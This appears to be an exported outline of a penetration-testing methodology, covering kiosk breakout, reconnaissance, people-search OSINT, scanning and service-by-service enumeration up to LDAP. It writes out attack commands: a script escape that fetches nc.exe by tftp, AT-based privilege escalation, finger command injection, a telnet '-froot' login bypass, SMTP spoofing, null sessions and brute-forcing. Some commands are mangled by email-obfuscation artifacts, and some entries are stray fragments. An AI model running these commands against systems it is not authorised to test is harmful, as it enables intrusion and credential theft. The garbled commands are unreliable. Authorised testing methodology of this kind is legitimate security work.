
1. Manual Testing
1.1. Create Batch File (cmd.bat)
1.1.1. 1
1.1.1.1. cmd.exe
1.1.2. 2
1.1.2.1. echo off
1.1.2.2. command
1.1.2.3. echo on
1.2. Host Scripting File (cmd.vbs)
1.2.1. Option Explicit
1.2.2. Dim objShell
1.2.3. Set objShell = CreateObject("WScript.Shell")
1.2.4. objShell.Run "%comspec% /k"
1.2.5. WScript.Quit
1.2.6. alternative functionality
1.2.6.1. objShell.Run "%comspec% /k c: & dir"
1.2.6.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
1.2.6.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
1.3. iKat
1.3.1. Integrated Kiosk Attack Tool
1.3.1.1. Reconnaissance
1.3.1.2. FileSystem Links
1.3.1.3. Common Dialogs
1.3.1.4. Application Handlers
1.3.1.5. Browser Plugins
1.3.1.6. iKAT Tools
1.4. AT Command - privilege escalation
1.4.1. AT HH:MM /interactive "cmd.exe"
1.4.2. AT HH:MM /interactive %comspec% /k
1.5. Keyboard Shortcuts/ Hotkeys
1.5.1. Ctrl + h – View History
1.5.2. Ctrl + n – New Browser
1.5.3. Shift + Left Click – New Browser
1.5.4. Ctrl + o – Internet Address (browse feature)
1.5.5. Ctrl + p – Print (to file)
1.5.6. Right Click (Shift + F10)
1.5.6.1. Save Image As
1.5.6.2. View Source
1.5.7. F1 – Jump to URL
1.5.8. SHIFT+F1: Local Task List
1.5.9. SHIFT+F2: Toggle Title Bar
1.5.10. SHIFT+F3: Close Remote Application
1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
1.5.12. CTRL+F2: Remote Task List
1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
1.5.14. ALT+F2: Cycle through programs
1.5.15. ALT+PLUS: Alt+TAB
1.5.16. ALT+MINUS: ALT+SHIFT+TAB
2. inurl:Citrix/AccessPlatform/auth/login.aspx
3. X11 port 6000+ open
3.1. X11 Enumeration
3.1.1. List open windows
3.1.2. Authentication Method
3.1.2.1. Xauth
3.1.2.2. Xhost
3.2. X11 Exploitation
3.2.1. xwd
3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
3.2.2. Keystrokes
3.2.2.1. Received
3.2.2.2. Transmitted
3.2.3. Screenshots
3.2.4. xhost +
3.3. Examine Configuration Files
3.3.1. /etc/Xn.hosts
3.3.2. /usr/lib/X11/xdm
3.3.3. /usr/lib/X11/xdm/xsession
3.3.4. /usr/lib/X11/xdm/xsession-remote
3.3.5. /usr/lib/X11/xdm/xsession.0
3.3.6. /usr/lib/X11/xdm/xdm-config
3.3.6.1. DisplayManager*authorize:on
4. pwdump [-h][-o][-u][-p] machineName
5. Nabil contributed the AS/400 section.
6. Client Side Security
7. Back end files
7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
8. Set objShell = CreateObject("WScript.Shell")
9. Check visible areas for sensitive information.
10. InitialProgram=c:\windows\system32\cmd.exe
11. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
12. http://secunia.com/advisories/search/?search=citrix
13. Pre-Inspection Visit - template
14. Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms: active and passive. A passive approach is always the best starting point, as it would normally defeat intrusion detection systems and other forms of protection afforded to the network; it usually involves discovering publicly available information by using a web browser, visiting newsgroups, etc. An active form is more intrusive and may show up in audit logs; it may take the form of an attempted DNS zone transfer or a social engineering type of attack.
14.1. Untitled
14.1.1. Authoritative Bodies
14.1.1.1. IANA - Internet Assigned Numbers Authority
14.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
14.1.1.3. NRO - Number Resource Organisation
14.1.1.4. RIR - Regional Internet Registry
14.1.1.4.1. AFRINIC - African Network Information Centre
14.1.1.4.2. APNIC - Asia Pacific Network Information Centre
14.1.1.4.3. ARIN - American Registry for Internet Numbers
14.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
14.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre
14.1.2. Websites
14.1.2.1. Central Ops
14.1.2.1.1. Domain Dossier
14.1.2.1.2. Email Dossier
14.1.2.2. DNS Stuff
14.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
14.1.2.3. Fixed Orbit
14.1.2.3.1. Autonomous System lookups and other online tools available.
14.1.2.4. Geektools
14.1.2.5. IP2Location
14.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
14.1.2.6. Kartoo
14.1.2.6.1. Metasearch engine that visually presents its results.
14.1.2.7. MyIPNeighbors.com
14.1.2.7.1. Excellent site that gives details of the domains sharing the IP queried and, conversely, IP to DNS resolution
14.1.2.8. My-IP-Neighbors.com
14.1.2.8.1. Excellent site that can be used if the above is down
14.1.2.9. myipneighbors.net
14.1.2.10. Netcraft
14.1.2.10.1. Online search tool allowing queries for host information.
14.1.2.11. Passive DNS Replication
14.1.2.11.1. Finds shared domains based on supplied IP addresses
14.1.2.11.2. Note: website utilised by the nmap hostmap.nse script
14.1.2.12. Robtex
14.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
14.1.2.12.2. Note: can be unreliable with old entries (use CentralOps to verify)
14.1.2.13. Traceroute.org
14.1.2.13.1. Website listing a large number of links to online traceroute resources.
14.1.2.14. Wayback Machine
14.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
14.1.2.15. Whois.net
14.1.3. Tools
14.1.3.1. Cheops-ng
14.1.3.2. Country whois
14.1.3.3. Domain Research Tool
14.1.3.4. Firefox Plugins
14.1.3.4.1. AS Number
14.1.3.4.2. Shazou
14.1.3.4.3. Firecat Suite
14.1.3.5. Gnetutil
14.1.3.6. Goolag Scanner
14.1.3.7. Greenwich
14.1.3.8. Maltego
14.1.3.9. GTWhois
14.1.3.10. Sam Spade
14.1.3.11. Smart whois
14.1.3.12. SpiderFoot
14.2. Internet Search
14.2.1. General Information
14.2.1.1. Web Investigator
14.2.1.2. Tracesmart
14.2.1.3. Friends Reunited
14.2.1.4. Ebay - profiles etc.
14.2.2. Financial
14.2.2.1. EDGAR - Company information, including real-time filings. US
14.2.2.2. Google Finance - General Finance Portal
14.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
14.2.2.4. Companies House UK
14.2.2.5. Land Registry UK
14.2.3. Phone book/ Electoral Roll Information
14.2.3.1. 123people
14.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
14.2.3.2. 192.com
14.2.3.2.1. Electoral Roll Search. UK
14.2.3.3. 411
14.2.3.3.1. Online White Pages and Yellow Pages. US
14.2.3.4. Untitled
14.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
14.2.3.5. BT.com. UK
14.2.3.5.1. Residential
14.2.3.5.2. Business
14.2.3.6. Pipl
14.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
14.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
14.2.3.7. Spokeo
14.2.3.7.1. http://www.spokeo.com/user?q=domain_name
14.2.3.7.2. http://www.spokeo.com/user?q=email_address
14.2.3.8. Yasni
14.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
14.2.3.9. Zabasearch
14.2.3.9.1. People Search Engine. US
14.2.4. Generic Web Searching
14.2.4.1. Code Search
14.2.4.2. Forum Entries
14.2.4.3. Google Hacking Database
14.2.4.4. Google
14.2.4.4.1. Email Addresses
14.2.4.4.2. Contact Details
14.2.4.5. Newsgroups/forums
14.2.4.6. Blog Search
14.2.4.6.1. Yammer
14.2.4.6.2. Google Blog Search
14.2.4.6.3. Technorati
14.2.4.6.4. Jaiku
14.2.4.6.5. Present.ly
14.2.4.6.6. Twitter Network Browser
14.2.4.7. Search Engine Comparison/ Aggregator Sites
14.2.4.7.1. Clusty
14.2.4.7.2. Grokker
14.2.4.7.3. Zuula
14.2.4.7.4. Exalead
14.2.4.7.5. Delicious
14.2.5. Metadata Search
14.2.5.1. Untitled
14.2.5.1.1. MetaData Visualisation Sites
14.2.5.1.2. Tools
14.2.5.1.3. Wikipedia Metadata Search
14.2.6. Social/ Business Networks
14.2.6.1. Untitled
14.2.6.1.1. Africa
14.2.6.1.2. Australia
14.2.6.1.3. Belgium
14.2.6.1.4. Holland
14.2.6.1.5. Hungary
14.2.6.1.6. Iran
14.2.6.1.7. Japan
14.2.6.1.8. Korea
14.2.6.1.9. Poland
14.2.6.1.10. Russia
14.2.6.1.11. Sweden
14.2.6.1.12. UK
14.2.6.1.13. US
14.2.6.1.14. Assorted
14.2.7. Resources
14.2.7.1. OSINT
14.2.7.2. International Directory of Search Engines
14.3. DNS Record Retrieval from publicly available servers
14.3.1. Types of Information Records
14.3.1.1. SOA Records - Indicates the server that has authority for the domain.
14.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
14.3.1.3. NS Records - List of a host’s or domain’s name server(s).
14.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
14.3.1.5. PTR Records - Maps an IP address back to a host's domain name (reverse lookup).
14.3.1.6. SRV Records - Service location record.
14.3.1.7. HINFO Records - Host information record with CPU type and operating system.
14.3.1.8. TXT Records - Generic text record.
14.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
14.3.1.10. RP - Responsible person for the domain.
14.3.2. Database Settings
14.3.2.1. Version.bind
14.3.2.2. Serial
14.3.2.3. Refresh
14.3.2.4. Retry
14.3.2.5. Expiry
14.3.2.6. Minimum
14.3.3. Sub Domains
14.3.4. Internal IP ranges
14.3.4.1. Reverse DNS for IP Range
14.3.5. Zone Transfer
14.4. Social Engineering
14.4.1. Remote
14.4.1.1. Phone
14.4.1.1.1. Scenarios
14.4.1.1.2. Results
14.4.1.1.3. Contact Details
14.4.1.2. Email
14.4.1.2.1. Scenarios
14.4.1.2.2. Software
14.4.1.2.3. Results
14.4.1.2.4. Contact Details
14.4.1.3. Other
14.4.2. Local
14.4.2.1. Personas
14.4.2.1.1. Name
14.4.2.1.2. Phone
14.4.2.1.3. Email
14.4.2.1.4. Business Cards
14.4.2.2. Contact Details
14.4.2.2.1. Name
14.4.2.2.2. Phone number
14.4.2.2.3. Email
14.4.2.2.4. Room number
14.4.2.2.5. Department
14.4.2.2.6. Role
14.4.2.3. Scenarios
14.4.2.3.1. New IT employee
14.4.2.3.2. Fire Inspector
14.4.2.4. Results
14.4.2.5. Maps
14.4.2.5.1. Satellite Imagery
14.4.2.5.2. Building layouts
14.4.2.6. Other
14.5. Dumpster Diving
14.5.1. Rubbish Bins
14.5.2. Contract Waste Removal
14.5.3. Ebay ex-stock sales i.e. HDD
14.6. Web Site copy
14.6.1. HTTrack
14.6.2. Teleport Pro
14.6.3. Black Widow
15. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: (1) OS fingerprinting and (2) identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system in use on a remote host. This is carried out by analysing packets received from the host in question. There are two distinct ways to fingerprint an OS: actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and waits for a reply (or lack thereof). Different operating systems respond differently to certain types of packet (the response is governed by an RFC and by any proprietary responses the vendor, notably Microsoft, has enabled within the system), so custom packets may be sent. The remote applications being served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
15.1. Default Port Lists
15.1.1. Windows
15.1.2. *nix
15.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.
15.2.1. General Enumeration Tools
15.2.1.1. nmap
15.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
15.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
15.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
15.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
15.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
15.2.1.2. netcat
15.2.1.2.1. nc -v -n IP_Address port
15.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
15.2.1.3. amap
15.2.1.3.1. amap -bqv 192.168.1.1 80
15.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
15.2.1.4. xprobe2
15.2.1.4.1. xprobe2 192.168.1.1
15.2.1.5. sinfp
15.2.1.5.1. ./sinfp.pl -i -p
15.2.1.6. nbtscan
15.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
15.2.1.7. hping
15.2.1.7.1. hping ip_address
15.2.1.8. scanrand
15.2.1.8.1. scanrand ip_address:all
15.2.1.9. unicornscan
15.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
15.2.1.10. netenum
15.2.1.10.1. netenum network/netmask timeout
15.2.1.11. fping
15.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
15.2.2. Firewall Specific Tools
15.2.2.1. firewalk
15.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
15.2.2.2. ftester
15.2.2.2.1. On host 1: ./ftestd -i eth0 -v
15.2.2.2.2. On host 2: ./ftest -f ftest.conf -v -d 0.01
15.2.2.2.3. Then: ./freport ftest.log ftestd.log
15.2.3. Default Passwords (Examine list)
15.2.3.1. Passwords A
15.2.3.2. Passwords B
15.2.3.3. Passwords C
15.2.3.4. Passwords D
15.2.3.5. Passwords E
15.2.3.6. Passwords F
15.2.3.7. Passwords G
15.2.3.8. Passwords H
15.2.3.9. Passwords I
15.2.3.10. Passwords J
15.2.3.11. Passwords K
15.2.3.12. Passwords L
15.2.3.13. Passwords M
15.2.3.14. Passwords N
15.2.3.15. Passwords O
15.2.3.16. Passwords P
15.2.3.17. Passwords R
15.2.3.18. Passwords S
15.2.3.19. Passwords T
15.2.3.20. Passwords U
15.2.3.21. Passwords V
15.2.3.22. Passwords W
15.2.3.23. Passwords X
15.2.3.24. Passwords Y
15.2.3.25. Passwords Z
15.2.3.26. Passwords (Numeric)
15.3. Active Hosts
15.3.1. Open TCP Ports
15.3.2. Closed TCP Ports
15.3.3. Open UDP Ports
15.3.4. Closed UDP Ports
15.3.5. Service Probing
15.3.5.1. SMTP Mail Bouncing
15.3.5.2. Banner Grabbing
15.3.5.2.1. Other
15.3.5.2.2. HTTP
15.3.5.2.3. HTTPS
15.3.5.2.4. SMTP
15.3.5.2.5. POP3
15.3.5.2.6. FTP
15.3.6. ICMP Responses
15.3.6.1. Type 3 (Port Unreachable)
15.3.6.2. Type 8 (Echo Request)
15.3.6.3. Type 13 (Timestamp Request)
15.3.6.4. Type 15 (Information Request)
15.3.6.5. Type 17 (Subnet Address Mask Request)
15.3.6.6. Responses from broadcast address
15.3.7. Source Port Scans
15.3.7.1. TCP/UDP 53 (DNS)
15.3.7.2. TCP 20 (FTP Data)
15.3.7.3. TCP 80 (HTTP)
15.3.7.4. TCP/UDP 88 (Kerberos)
15.3.8. Firewall Assessment
15.3.8.1. Firewalk
15.3.8.2. TCP/UDP/ICMP responses
15.3.9. OS Fingerprint
16. Enumeration
16.1. Daytime port 13 open
16.1.1. nmap nse script
16.1.1.1. daytime
16.2. FTP port 21 open
16.2.1. Fingerprint server
16.2.1.1. telnet ip_address 21 (Banner grab)
16.2.1.2. Run command ftp ip_address
16.2.1.3. [email protected]
16.2.1.4. Check for anonymous access
16.2.1.4.1. ftp ip_address (Username: anonymous OR anon; Password: [email protected])
16.2.2. Password guessing
16.2.2.1. Hydra brute force
16.2.2.2. medusa
16.2.2.3. Brutus
16.2.3. Examine configuration files
16.2.3.1. ftpusers
16.2.3.2. ftp.conf
16.2.3.3. proftpd.conf
16.2.4. MiTM
16.2.4.1. pasvagg.pl
16.3. SSH port 22 open
16.3.1. Fingerprint server
16.3.1.1. telnet ip_address 22 (banner grab)
16.3.1.2. scanssh
16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
16.3.2. Password guessing
16.3.2.1. ssh [email protected]_address
16.3.2.2. guess-who
16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
16.3.2.3. Hydra brute force
16.3.2.4. brutessh
16.3.2.5. Ruby SSH Bruteforcer
16.3.3. Examine configuration files
16.3.3.1. ssh_config
16.3.3.2. sshd_config
16.3.3.3. authorized_keys
16.3.3.4. ssh_known_hosts
16.3.3.5. .shosts
16.3.4. SSH Client programs
16.3.4.1. tunnelier
16.3.4.2. winsshd
16.3.4.3. putty
16.3.4.4. winscp
16.4. Telnet port 23 open
16.4.1. Fingerprint server
16.4.1.1. telnet ip_address
16.4.1.1.1. Common Banner List (OS / Banner)
16.4.1.1.1.1. Solaris 8 / SunOS 5.8
16.4.1.1.1.2. Solaris 2.6 / SunOS 5.6
16.4.1.1.1.3. Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)
16.4.1.1.1.4. SunOS 4.1.x / SunOS Unix (hostname)
16.4.1.1.1.5. FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
16.4.1.1.1.6. NetBSD / NetBSD/i386 (hostname) (ttyp1)
16.4.1.1.1.7. OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
16.4.1.1.1.8. Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
16.4.1.1.1.9. Debian 3.0 / Debian GNU/Linux 3.0 / hostname
16.4.1.1.1.10. SGI IRIX 6.x / IRIX (hostname)
16.4.1.1.1.11. IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
16.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
16.4.1.1.1.13. Nokia IPSO / IPSO (hostname) (ttyp0)
16.4.1.1.1.14. Cisco IOS / User Access Verification
16.4.1.1.1.15. Livingston ComOS / ComOS - Livingston PortMaster
16.4.1.2. telnetfp
16.4.2. Password Attack
16.4.2.2. Brutus
16.4.2.3. Hydra brute force
16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
16.4.3. Examine configuration files
16.4.3.1. /etc/xinetd.d/telnet
16.4.3.2. /etc/xinetd.d/stelnet
16.5. Sendmail Port 25 open
16.5.1. Fingerprint server
16.5.1.1. telnet ip_address 25 (banner grab)
16.5.2. Mail Server Testing
16.5.2.1. Enumerate users
16.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
16.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
16.5.2.2. Mail Spoof Test
16.5.2.2.1. Manual SMTP session (one command per line):
16.5.2.2.1.1. HELO anything
16.5.2.2.1.2. MAIL FROM: spoofed_address
16.5.2.2.1.3. RCPT TO: valid_mail_account
16.5.2.2.1.4. DATA
16.5.2.2.1.5. . (a single dot on a line by itself ends the message body)
16.5.2.2.1.6. QUIT
16.5.2.3. /etc/inetd.conf
16.5.2.4. Mail Relay Test
16.5.3. Examine Configuration Files
16.5.3.1. sendmail.cf
16.5.3.2. submit.cf
16.6. DNS port 53 open
16.6.1. Fingerprint server/ service
16.6.1.1. host
16.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
16.6.1.1.1.1. -v verbose format
16.6.1.1.1.2. -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.
16.6.1.1.1.3. -a Same as -t ANY.
16.6.1.1.1.4. -l Zone transfer (if allowed).
16.6.1.1.1.5. -f Save to a specified filename.
16.6.1.2. nslookup
16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
16.6.1.3. dig
16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
16.6.1.4. whois
16.6.1.4.1. -h Use the named host to resolve the query
16.6.1.4.2. -a Use ARIN to resolve the query
16.6.1.4.3. -r Use RIPE to resolve the query
16.6.1.4.4. -p Use APNIC to resolve the query
16.6.1.4.5. -Q Perform a quick lookup
16.6.2. DNS Enumeration
16.6.2.1. Bile Suite
16.6.2.1.1. perl BiLE.pl [website] [project_name]
16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
16.6.2.1.5. perl exp-tld.pl [input file] [output file]
16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
16.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]
16.6.2.2. txdns
16.6.2.2.1. txdns -rt -t domain_name
16.6.2.2.2. txdns -x 50 -bb domain_name
16.6.2.3. nmap nse scripts
16.6.2.3.1. dns-random-srcport
16.6.2.3.2. dns-random-txid
16.6.2.3.3. dns-recursion
16.6.2.3.4. dns-zone-transfer
16.6.3. Examine Configuration Files
16.6.3.1. host.conf
16.6.3.2. resolv.conf
16.6.3.3. named.conf
16.7. perl qtrace.pl [ip_address_file] [output_file]
16.8. TFTP port 69 open
16.8.1. TFTP Enumeration
16.8.1.1. tftp ip_address PUT local_file
16.8.1.2. tftp ip_address GET conf.txt (or other files)
16.8.1.3. Solarwinds TFTP server
16.8.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)
16.8.2. TFTP Bruteforcing
16.8.2.1. TFTP bruteforcer
16.8.2.2. Cisco-Torch
16.9. Finger Port 79 open
16.9.1. User enumeration
16.9.1.1. finger 'a b c d e f g h' @example.com
16.9.1.2. finger [email protected]
16.9.1.3. finger [email protected]
16.9.1.4. finger [email protected]
16.9.1.5. finger [email protected]
16.9.1.6. finger **@example.com
16.9.1.7. finger [email protected]
16.9.1.8. finger @example.com
16.9.1.9. nmap nse script
16.9.1.9.1. finger
16.9.2. Command execution
16.9.2.1. finger "|/bin/[email protected]"
16.9.2.2. finger "|/bin/ls -a /@example.com"
16.9.3. Finger Bounce
16.9.3.1. finger [email protected]@victim
16.9.3.2. finger @[email protected]
16.10. Web Ports 80,8080 etc. open
16.10.1. Fingerprint server
16.10.1.1. Telnet ip_address port
16.10.1.2. Firefox plugins
16.10.1.2.1. All
16.10.1.2.2. Specific
16.10.2. Crawl website
16.10.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)
16.10.2.2. httprint
16.10.2.3. Metagoofil
16.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
16.10.3. Web Directory enumeration
16.10.3.1. Nikto
16.10.3.1.1. nikto [-h target] [options]
16.10.3.2. DirBuster
16.10.3.3. Wikto
16.10.3.4. Goolag Scanner
16.10.4. Vulnerability Assessment
16.10.4.1. Manual Tests
16.10.4.1.1. Default Passwords
16.10.4.1.2. Install Backdoors
16.10.4.1.3. Method Testing
16.10.4.1.4. Upload Files
16.10.4.1.5. View Page Source
16.10.4.1.6. Input Validation Checks
16.10.4.1.7. Automated table and column iteration
16.10.4.2. Vulnerability Scanners
16.10.4.2.1. Acunetix
16.10.4.2.2. Grendelscan
16.10.4.2.3. NStealth
16.10.4.2.4. Obiwan III
16.10.4.2.5. w3af
16.10.4.3. Specific Applications/ Server Tools
16.10.4.3.1. Domino
16.10.4.3.2. Joomla
16.10.4.3.3. aspaudit.pl
16.10.4.3.4. Vbulletin
16.10.4.3.5. ZyXel
16.10.5. Proxy Testing
16.10.5.1. Burpsuite
16.10.5.2. Crowbar
16.10.5.3. Interceptor
16.10.5.4. Paros
16.10.5.5. Requester Raw
16.10.5.6. Suru
16.10.5.7. WebScarab
16.10.6. Examine configuration files
16.10.6.1. Generic
16.10.6.1.1. Examine httpd.conf/ windows config files
16.10.6.2. JBoss
16.10.6.2.1. JMX Console http://<IP>:8080/jmx-console/
16.10.6.3. Joomla
16.10.6.3.1. configuration.php
16.10.6.3.2. diagnostics.php
16.10.6.3.3. joomla.inc.php
16.10.6.3.4. config.inc.php
16.10.6.4. Mambo
16.10.6.4.1. configuration.php
16.10.6.4.2. config.inc.php
16.10.6.5. Wordpress
16.10.6.5.1. setup-config.php
16.10.6.5.2. wp-config.php
16.10.6.6. ZyXel
16.10.6.6.1. /WAN.html (contains PPPoE ISP password)
16.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
16.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)
16.10.6.6.4. /Firewall_DefPolicy.html (Firewall)
16.10.6.6.5. /CF_Keyword.html (Content Filter)
16.10.6.6.6. /RemMagWWW.html (Remote MGMT)
16.10.6.6.7. /rpSysAdmin.html (System)
16.10.6.6.8. /LAN_IP.html (LAN)
16.10.6.6.9. /NAT_General.html (NAT)
16.10.6.6.10. /ViewLog.html (Logs)
16.10.6.6.11. /rpFWUpload.html (Tools)
16.10.6.6.12. /DiagGeneral.html (Diagnostic)
16.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)
16.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
16.10.6.6.15. Config Backups
16.10.7. Examine web server logs
16.10.7.1. c:\winnt\system32\Logfiles\W3SVC1
16.10.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq
16.10.8. References
16.10.8.1. White Papers
16.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
16.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
16.10.8.1.3. Blind Security Testing - An Evolutionary Approach
16.10.8.1.4. Command Injection in XML Signatures and Encryption
16.10.8.1.5. Input Validation Cheat Sheet
16.10.8.1.6. SQL Injection Cheat Sheet
16.10.8.2. Books
16.10.8.2.1. Hacking Exposed Web 2.0
16.10.8.2.2. Hacking Exposed Web Applications
16.10.8.2.3. The Web Application Hacker's Handbook
16.10.9. Exploit Frameworks
16.10.9.1. Brute-force Tools
16.10.9.1.1. Acunetix
16.10.9.2. Metasploit
16.10.9.3. w3af
16.11. Portmapper port 111 open
16.11.1. rpcdump.py
16.11.1.1. rpcdump.py username:[email protected]_Address port/protocol (i.e. 80/HTTP)
16.11.2. rpcinfo
16.11.2.1. rpcinfo [options] IP_Address
16.12. NTP Port 123 open
16.12.1. NTP Enumeration
16.12.1.1. ntpdc -c monlist IP_ADDRESS
16.12.1.2. ntpdc -c sysinfo IP_ADDRESS
16.12.1.3. ntpq
16.12.1.3.1. host
16.12.1.3.2. hostname
16.12.1.3.3. ntpversion
16.12.1.3.4. readlist
16.12.1.3.5. version
16.12.2. Examine configuration files
16.12.2.1. ntp.conf
16.12.3. nmap nse script
16.12.3.1. ntp-info
16.13. NetBIOS Ports 135-139,445 open
16.13.1. NetBIOS enumeration
16.13.1.1. Enum
16.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
16.13.1.2. Null Session
16.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
16.13.1.3. Smbclient
16.13.1.3.1. smbclient -L //server/share password options
16.13.1.4. Superscan
16.13.1.4.1. Enumeration tab.
16.13.1.5. user2sid/sid2user
16.13.1.6. Winfo
16.13.2. NetBIOS brute force
16.13.2.1. Hydra
16.13.2.2. Brutus
16.13.2.3. Cain & Abel
16.13.2.4. getacct
16.13.2.5. NAT (NetBIOS Auditing Tool)
16.13.3. Examine Configuration Files
16.13.3.1. Smb.conf
16.13.3.2. lmhosts
16.14. SNMP port 161 open
16.14.1. Default Community Strings
16.14.1.1. public
16.14.1.2. private
16.14.1.3. cisco
16.14.1.3.1. cable-docsis
16.14.1.3.2. ILMI
16.14.2. MIB enumeration
16.14.2.1. Windows NT
16.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
16.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
16.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
16.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
16.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
16.14.2.2. Solarwinds MIB walk
16.14.2.3. Getif
16.14.2.4. snmpwalk
16.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
16.14.2.5. Snscan
16.14.2.6. Applications
16.14.2.6.1. ZyXel
16.14.2.7. nmap nse script
16.14.2.7.1. snmp-sysdescr
16.14.3. SNMP Bruteforce
16.14.3.1. onesixtyone
16.14.3.1.1. onesixtyone -c SNMP.wordlist <IP>
16.14.3.2. cat
16.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist
16.14.3.3. Solarwinds SNMP Brute Force
16.14.3.4. ADMsnmp
16.14.3.5. nmap nse script
16.14.3.5.1. snmp-brute
16.14.4. Examine SNMP Configuration files
16.14.4.1. snmp.conf
16.14.4.2. snmpd.conf
16.14.4.3. snmp-config.xml
16.15. LDAP Port 389 Open
16.15.1. ldap enumeration
